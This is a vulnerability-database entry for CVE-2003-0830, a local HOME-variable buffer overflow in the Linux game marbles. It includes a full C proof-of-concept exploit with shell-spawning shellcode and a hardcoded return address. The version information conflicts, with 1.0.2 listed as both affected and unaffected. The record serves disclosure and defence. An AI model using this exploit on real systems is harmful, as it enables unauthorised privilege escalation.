CVE-2003-0830
CVSS 4.6
Published: 2003-11-17 00:00:00
Revised: 2008-09-10 15:20:35

[Original] Buffer overflow in marbles 1.0.2 and earlier allows local users to gain privileges via a long HOME environment variable.


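[CNNVD] marbles Local Environment Variable Buffer Overflow Vulnerability (CNNVD-200311-083)

        
        marbles is a game program for Linux.
        marbles lacks proper buffer bounds checking when handling environment variables. A local attacker can exploit this to carry out a buffer overflow attack and execute arbitrary commands on the system with 'game' group privileges.
        The problem is that Marbles lacks sufficient bounds checking when handling the HOME environment variable. By supplying an overly long HOME environment variable, an attacker can execute arbitrary commands on the system with 'game' group privileges.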
        

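- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]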

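- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details Used for Detection)

No related OVAL definition found

- Official Database Links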

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0830
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0830
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-083
(Official data source) CNNVD

- Other Links and Resources

http://www.debian.org/security/2003/dsa-390
(VENDOR_ADVISORY)  DEBIAN  DSA-390

- Vulnerability Information

marbles Local Environment Variable Buffer Overflow Vulnerability
Medium severity  Boundary condition error
2003-11-17 00:00:00 2005-10-20 00:00:00
Local

- Advisories and Patches

        Vendor patch:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-390

- Vulnerability Information (23189)

marbles 1.0.1 Local Home Environment Variable Buffer Overflow Vulnerability (EDBID:23189)
linux local
2003-09-26 Verified
0 demz
N/A
source: http://www.securityfocus.com/bid/8710/info

A problem in the handling of data in the Home environment variable has been reported in the marbles program. This may make it possible for a local attacker to gain elevated privileges. 

/* c-marbles.c
 *
 * PoC exploit made for advisory based upon a local stack-based overflow.
 * Vulnerable versions, maybe also prior versions:
 *
 * Marbles v1.0.5
 *
 * Tested on:  Redhat 9.0
 *
 * Advisory source: Steve Kemp
 * http://www.debian.org/security/2003/dsa-390
 *
 * ---------------------------------------------
 * coded by: demz (c-code.net) (demz@c-code.net)
 * ---------------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, strlen */
#include <unistd.h>     /* execl */

char shellcode[]=

        "\x31\xc0"                      // xor          eax, eax
        "\x31\xdb"                      // xor          ebx, ebx
        "\x31\xc9"                      // xor          ecx, ecx
        "\xb0\x46"                      // mov          al, 70
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\x50"                          // push         eax
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f
        "\x89\xe3"                      // mov          ebx, esp
        "\x50"                          // push         eax
        "\x53"                          // push         ebx
        "\x89\xe1"                      // mov          ecx, esp
        "\x99"                          // cdq
        "\xb0\x0b"                      // mov          al, 11
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\xb0\x01"                      // mov          al, 1
        "\xcd\x80";                     // int          0x80

int main()
{
        unsigned long ret = 0xbffff70c;

        /* 3988 filler bytes + 4-byte return address + terminating NUL */
        char buffer[3993];
        int i;

        /* Fill the whole buffer with NOPs (0x90) */
        memset(buffer, 0x90, sizeof(buffer));

        for (i = 0; i < strlen(shellcode) - 1; i++)
                buffer[2000 + i] = shellcode[i];

        /* Return address in little-endian order, then the NUL terminator */
        buffer[3988] = (ret & 0x000000ff);
        buffer[3989] = (ret & 0x0000ff00) >> 8;
        buffer[3990] = (ret & 0x00ff0000) >> 16;
        buffer[3991] = (ret & 0xff000000) >> 24;
        buffer[3992] = 0x0;

        printf("\nMarbles v1.0.5 local exploit\n");
        printf("---------------------------------------- demz @ c-code.net --\n");

        setenv("HOME", buffer, 1);

        execl("/usr/local/bin/marbles", "marbles", (char *)NULL);

        /* Only reached if execl() fails */
        return 1;
}
		

- Vulnerability Information

11707
marbles HOME Environment Variable Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability Description

Unknown or Incomplete

- Timeline

2003-09-26 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

marbles Local Home Environment Variable Buffer Overflow Vulnerability
Boundary Condition Error 8710
No Yes
2003-09-26 12:00:00 2009-07-11 11:56:00
Discovery credited to Steve Kemp.

- Affected Program Versions

marbles marbles 1.0.1
marbles marbles 1.0.2

- Unaffected Program Versions

marbles marbles 1.0.2

- Vulnerability Discussion

A problem in the handling of data in the Home environment variable has been reported in the marbles program. This may make it possible for a local attacker to gain elevated privileges.

- Exploit

Exploit code has been developed:

- Solution

Debian has released advisory DSA 390-1. See referenced advisory for fix information and additional details.

- Related References
